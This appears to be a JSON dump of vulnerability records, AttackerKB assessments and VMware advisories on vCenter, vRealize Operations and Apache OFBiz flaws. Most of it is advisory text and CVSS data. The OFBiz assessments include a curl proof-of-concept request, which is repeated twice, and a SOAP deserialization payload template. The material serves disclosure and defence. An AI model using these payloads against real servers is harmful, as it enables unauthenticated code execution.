"vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-06-05T00:00:00", "id": "AKB:DA3A63D5-4ECE-465D-8289-BD8119F15E95", "href": "https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2023-05-27T14:39:40", "description": "The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 24, 2021 3:58am UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\n**NinjaOperator** at September 21, 2021 6:53pm UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\n**architect00** at September 22, 2021 1:31pm UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T00:00:00", "type": "attackerkb", "title": "CVE-2021-22005", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-22005"], "modified": "2021-09-29T00:00:00", "id": "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "href": "https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-04T17:09:20", "description": "XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03\n\n \n**Recent assessments:** \n \n**wvu-r7** at August 13, 2020 8:00pm UTC reported:\n\nPre-auth RCE in [ERP](<https://en.wikipedia.org/wiki/Enterprise_resource_planning>) software that\u2019s free and isn\u2019t SAP? Sweet. And it\u2019s a long-standing Apache project that\u2019s often recommended. Here\u2019s a PoC:\n \n \n wvu@kharak:~$ curl -vH \"Content-Type: text/xml\" http://127.0.0.1:8080/webtools/control/xmlrpc -d '<?xml version=\"1.0\"?><methodCall><methodName>foo</methodName><params><param><value><struct><member><name>bar</name><value><serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\"></serializable></value></member></struct></value></param></params></methodCall>'\n * Trying 127.0.0.1...\n * TCP_NODELAY set\n * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)\n > POST /webtools/control/xmlrpc HTTP/1.1\n > Host: 127.0.0.1:8080\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: text/xml\n > Content-Length: 273\n >\n * upload completely sent off: 273 out of 273 bytes\n < HTTP/1.1 200 OK\n < Server: Apache-Coyote/1.1\n < Set-Cookie: JSESSIONID=D090A373F50D50CF8CFCF2F9E301D04A.jvm1; Path=/webtools/; Secure; HttpOnly\n < Set-Cookie: OFBiz.Visitor=10221; Expires=Fri, 13-Aug-2021 19:57:20 GMT; Path=/\n < Content-Type: text/xml;charset=UTF-8\n < Transfer-Encoding: chunked\n < Vary: Accept-Encoding\n < Date: Thu, 13 Aug 2020 19:57:20 GMT\n <\n * Connection #0 to host 127.0.0.1 left intact\n <?xml version=\"1.0\" encoding=\"UTF-8\"?><methodResponse xmlns:ex=\"http://ws.apache.org/xmlrpc/namespaces/extensions\"><fault><value><struct><member><name>faultCode</name><value><i4>0</i4></value></member><member><name>faultString</name><value>Failed to read result object: null</value></member></struct></value></fault></methodResponse>* Closing connection 0\n wvu@kharak:~$\n \n\nA lot of orgs rely on ERP software, and you\u2019re bound to find sensitive information in an ERP system. Note that these systems will likely be inside the network perimeter. High value for pentesters on an internal, I\u2019d say.\n\nNote that the [CVE](<https://nvd.nist.gov/vuln/detail/CVE-2020-9496>) seems to conflate this with XSS. CVSS score seems lower than I\u2019d expect.\n\nETA: Here\u2019s an exploit: <https://github.com/rapid7/metasploit-framework/pull/14000>.\n\n**pbarry-r7** at August 24, 2020 3:13am UTC reported:\n\nPre-auth RCE in [ERP](<https://en.wikipedia.org/wiki/Enterprise_resource_planning>) software that\u2019s free and isn\u2019t SAP? Sweet. And it\u2019s a long-standing Apache project that\u2019s often recommended. Here\u2019s a PoC:\n \n \n wvu@kharak:~$ curl -vH \"Content-Type: text/xml\" http://127.0.0.1:8080/webtools/control/xmlrpc -d '<?xml version=\"1.0\"?><methodCall><methodName>foo</methodName><params><param><value><struct><member><name>bar</name><value><serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\"></serializable></value></member></struct></value></param></params></methodCall>'\n * Trying 127.0.0.1...\n * TCP_NODELAY set\n * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)\n > POST /webtools/control/xmlrpc HTTP/1.1\n > Host: 127.0.0.1:8080\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: text/xml\n > Content-Length: 273\n >\n * upload completely sent off: 273 out of 273 bytes\n < HTTP/1.1 200 OK\n < Server: Apache-Coyote/1.1\n < Set-Cookie: JSESSIONID=D090A373F50D50CF8CFCF2F9E301D04A.jvm1; Path=/webtools/; Secure; HttpOnly\n < Set-Cookie: OFBiz.Visitor=10221; Expires=Fri, 13-Aug-2021 19:57:20 GMT; Path=/\n < Content-Type: text/xml;charset=UTF-8\n < Transfer-Encoding: chunked\n < Vary: Accept-Encoding\n < Date: Thu, 13 Aug 2020 19:57:20 GMT\n <\n * Connection #0 to host 127.0.0.1 left intact\n <?xml version=\"1.0\" encoding=\"UTF-8\"?><methodResponse xmlns:ex=\"http://ws.apache.org/xmlrpc/namespaces/extensions\"><fault><value><struct><member><name>faultCode</name><value><i4>0</i4></value></member><member><name>faultString</name><value>Failed to read result object: null</value></member></struct></value></fault></methodResponse>* Closing connection 0\n wvu@kharak:~$\n \n\nA lot of orgs rely on ERP software, and you\u2019re bound to find sensitive information in an ERP system. Note that these systems will likely be inside the network perimeter. High value for pentesters on an internal, I\u2019d say.\n\nNote that the [CVE](<https://nvd.nist.gov/vuln/detail/CVE-2020-9496>) seems to conflate this with XSS. CVSS score seems lower than I\u2019d expect.\n\nETA: Here\u2019s an exploit: <https://github.com/rapid7/metasploit-framework/pull/14000>.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-15T00:00:00", "type": "attackerkb", "title": "CVE-2020-9496", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9496", "CVE-2021-26295", "CVE-2021-29200"], "modified": "2020-08-28T00:00:00", "id": "AKB:274E3983-7823-4CD0-B47C-0EBC25DD5646", "href": "https://attackerkb.com/topics/0T2QSZYDuD/cve-2020-9496", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-11T22:45:04", "description": "Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at March 31, 2021 1:24pm UTC reported:\n\nThis vulnerability is pretty straightforward to exploit. It is due to an unauthenticated SOAP interface in the Apache OFBiz application that accepts and deserializes an arbitrary Java object. This can be leveraged by an attacker to submit a payload to the server that after being deserialized will result in a command being executed. The [YSoSerial](<https://github.com/frohoff/ysoserial>) `ROME` gadget chain can be used for this purpose.\n\nThe serialized object is encoded in hex and placed within the `cus-obj` XML node of the SOAP request:\n \n \n <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header/>\n <soapenv:Body>\n <ser>\n <map-HashMap>\n <map-Entry>\n <map-Key>\n <cus-obj>$hexGadgetChain</cus-obj>\n </map-Key>\n <map-Value>\n <std-String value=\"http://example.com\"/>\n </map-Value>\n </map-Entry>\n </map-HashMap>\n </ser>\n </soapenv:Body>\n </soapenv:Envelope>\n \n\nThis was taken from a [PoC](<https://github.com/yumusb/CVE-2021-26295-POC/blob/main/poc.py>) which was credited in the Metasploit exploit module.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-22T00:00:00", "type": "attackerkb", "title": "CVE-2021-26295", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2170", "CVE-2021-26295", "CVE-2021-29200", "CVE-2021-30128", "CVE-2021-37608"], "modified": "2021-03-26T00:00:00", "id": "AKB:9A355845-4C8F-48C3-9829-4A54539E1FB8", "href": "https://attackerkb.com/topics/gPRJEi19sG/cve-2021-26295", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2021-09-03T02:07:16", "description": "##### **1\\. Impacted Products**\n\n * VMware vRealize Operations \n\n * VMware Cloud Foundation \n\n * vRealize Suite Lifecycle Manager \n\n\n##### **2\\. Introduction**\n\nMultiple vulnerabilities in VMware vRealize Operations were privately reported to VMware. Patches and Workarounds are available to address these vulnerabilities in impacted VMware products. \n\n\n##### **3a. Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975)**\n\n**Description**\n\nThe vRealize Operations Manager API contains a Server Side Request Forgery. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of [8.6](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N>). \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials. \n\n\n**Resolution**\n\nTo remediate CVE-2021-21975 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to impacted deployments. \n\n\n**Workarounds**\n\nWorkarounds for CVE-2021-21975 have been listed in the 'Workarounds' column of the 'Response Matrix' below. \n\n\n**Additional Documentation**\n\nA FAQ was created which is listed in the 'Additional Documentation' column of the 'Response Matrix' below.\n\n**Acknowledgements**\n\nVMware would like to thank Egor Dimitrenko of Positive Technologies for reporting this vulnerability to us. \n\n\n##### **3b. Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983)**\n\n**Description**\n\nThe vRealize Operations Manager API contains an arbitrary file write vulnerability. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of [7.2](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>). \n\n\n**Known Attack Vectors**\n\nAn authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system. \n\n\n**Resolution**\n\nTo remediate CVE-2021-21983 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nWorkarounds for CVE-2021-21983 have been listed in the 'Workarounds' column of the 'Response Matrix' below. \n\n\n**Additional Documentation**\n\nA FAQ was created which is listed in the 'Additional Documentation' column of the 'Response Matrix' below. \n\n\n**Acknowledgements**\n\nVMware would like to thank Egor Dimitrenko of Positive Technologies for reporting this vulnerability to us. \n\n\n**Notes**\n\n[1] The hotfixes previously mentioned in this advisory were found to only have partially resolved CVE-2021-21975 leaving a residual risk of moderate severity (CVSS = 4.3). Hotfixes created to resolve the vulnerabilities documented in [VMSA-2021-0018](<https://www.vmware.com/security/advisories/VMSA-2021-0018.html>) also include complete fixes for CVE-2021-21975. \n \n[2] vRealize Operations Manager 8.4.0 shipped with the aforementioned incomplete fixes, and is therefore partially impacted by CVE-2021-21975.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-03-30T00:00:00", "type": "vmware", "title": "VMware vRealize Operations updates address Server Side Request Forgery and Arbitrary File Write vulnerabilities (CVE-2021-21975, CVE-2021-21983)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-03-31T00:00:00", "id": "VMSA-2021-0004.1", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0004.1.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2023-05-27T15:13:03", "description": "3a. Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) \n\nThe vRealize Operations Manager API contains a Server Side Request Forgery. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of 8.6. \n\n3b. Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) \n\nThe vRealize Operations Manager API contains an arbitrary file write vulnerability. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of 7.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-30T00:00:00", "type": "vmware", "title": "VMware vRealize Operations updates address Server Side Request Forgery and Arbitrary File Write vulnerabilities (CVE-2021-21975, CVE-2021-21983)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-08-24T00:00:00", "id": "VMSA-2021-0004.2", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0004.2.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2021-09-29T11:05:22", "description": "##### **1\\. Impacted Products**\n\n * VMware vCenter Server (vCenter Server) \n\n * VMware Cloud Foundation (Cloud Foundation) \n\n\n##### **2\\. Introduction**\n\nMultiple vulnerabilities in VMware vCenter Server were privately reported to VMware. Updates are available to remediate these vulnerabilities in affected VMware products. \n\n\n##### **3a. vCenter Server file upload vulnerability (CVE-2021-22005)**\n\n**Description**\n\nThe vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. VMware has evaluated the severity of this issue to be in the [Critical severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [9.8.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22005 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nWorkarounds for CVE-2021-22005 have been listed in the 'Workarounds' column of the 'Response Matrix' below. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\n * **VMware has confirmed reports that CVE-2021-22005 is being exploited in the wild.** \n\n * This issue does not affect vCenter Server 6.5. \n\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us. \n\n\n\n\n##### **3b. vCenter Server local privilege escalation vulnerability (CVE-2021-21991)**\n\n**Description**\n\nThe vCenter Server contains a local privilege escalation vulnerability due to the way it handles session tokens. VMware has evaluated the severity of this issue to be in the [Important severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [8.8](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H>).\n\n**Known Attack Vectors**\n\nA malicious actor with non-administrative user access on vCenter Server host may exploit this issue to escalate privileges to Administrator on the vSphere Client (HTML5) or vCenter Server vSphere Web Client (FLEX/Flash). \n\n\n**Resolution**\n\nTo remediate CVE-2021-21991 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: https://via.vmw.com/vmsa-2021-0020-faq \n\n\n**Notes**\n\nNone.\n\n**Acknowledgements**\n\nVMware would like to thank Hynek Petrak of Schneider Electric for reporting this issue to us. \n\n\n\n\n##### **3c. vCenter Server reverse proxy bypass vulnerability (CVE-2021-22006)**\n\n**Description**\n\nThe vCenter Server contains a reverse proxy bypass vulnerability due to the way the endpoints handle the URI. VMware has evaluated the severity of this issue to be in the [Important severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [8.3.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 443 on vCenter Server may exploit this issue to access restricted endpoints. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22006 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nThis issue does not affect vCenter Server 6.5. \n\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us.\n\n\n\n##### **3d. vCenter server unauthenticated API endpoint vulnerability (CVE-2021-22011)**\n\n**Description**\n\nThe vCenter Server contains an unauthenticated API endpoint vulnerability in vCenter Server Content Library. VMware has evaluated the severity of this issue to be in the [Important severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [8.1](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:H>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 443 on vCenter Server may exploit this issue to perform unauthenticated VM network setting manipulation. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22011 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nNone.\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us.\n\n\n\n##### **3e. vCenter Server improper permission local privilege escalation vulnerabilities (CVE-2021-22015)**\n\n**Description**\n\nThe vCenter Server contains multiple local privilege escalation vulnerabilities due to improper permissions of files and directories. VMware has evaluated the severity of these issues to be in the [Important severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [7.8.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nAn authenticated local user with non-administrative privilege may exploit these issues to elevate their privileges to root on vCenter Server Appliance. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22015 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nNone.\n\n**Acknowledgements**\n\nVMware would like to thank Yuval Lazar (@Ul7raVi0l3t) of Pentera, Sergey Gerasimov and George webpentest Noseevich of Solidlab working with Trend Micro Zero Day Initiative for independently reporting these issues to us.\n\n\n\n##### **3f. vCenter Server unauthenticated API information disclosure vulnerability (CVE-2021-22012)**\n\n**Description**\n\nThe vCenter Server contains an information disclosure vulnerability due to an unauthenticated appliance management API. VMware has evaluated the severity of this issue to be in the [Important severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [7.5](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N>). \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 443 on vCenter Server may exploit this issue to gain access to sensitive information. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22012 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nThis issue affects only vCenter Server 6.5.\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us.\n\n\n\n##### **3g. vCenter Server file path traversal vulnerability (CVE-2021-22013)**\n\n**Description**\n\nThe vCenter Server contains a file path traversal vulnerability leading to information disclosure in the appliance management API. VMware has evaluated the severity of this issue to be in the [Important severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [7.5](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N>). \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 443 on vCenter Server may exploit this issue to gain access to sensitive information. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22013 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nThis issue affects only vCenter Server 6.5. \n\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us.\n\n\n\n##### **3h. vCenter Server reflected XSS vulnerability (CVE-2021-22016)**\n\n**Description**\n\nThe vCenter Server contains a reflected cross-site scripting vulnerability due to a lack of input sanitization. VMware has evaluated the severity of this issue to be in the [Important severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [7.5](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H>). \n\n\n**Known Attack Vectors**\n\nAn attacker may exploit this issue to execute malicious scripts by tricking a victim into clicking a malicious link. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22016 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nThis issue affects only vCenter Server 6.7.\n\n**Acknowledgements**\n\nVMware would like to thank icez for reporting this issue to us.\n\n\n\n##### **3i. vCenter Server rhttpproxy bypass vulnerability (CVE-2021-22017)**\n\n**Description**\n\nRhttproxy as used in vCenter Server contains a vulnerability due to improper implementation of URI normalization. VMware has evaluated the severity of this issue to be in the [Important severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [7.3](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 443 on vCenter Server may exploit this issue to bypass proxy leading to internal endpoints being accessed. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22017 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nThis issue does not affect vCenter Server 7.0. \n\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us.\n\n\n\n##### **3j. vCenter Server authenticated code execution vulnerability (CVE-2021-22014)**\n\n**Description**\n\nThe vCenter Server contains an authenticated code execution vulnerability in VAMI (Virtual Appliance Management Infrastructure). VMware has evaluated the severity of this issue to be in the [Important severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [7.2](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nAn authenticated VAMI user with network access to port 5480 on vCenter Server may exploit this issue to execute code on the underlying operating system that hosts vCenter Server. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22014 apply the updates listed in the 'Fixed 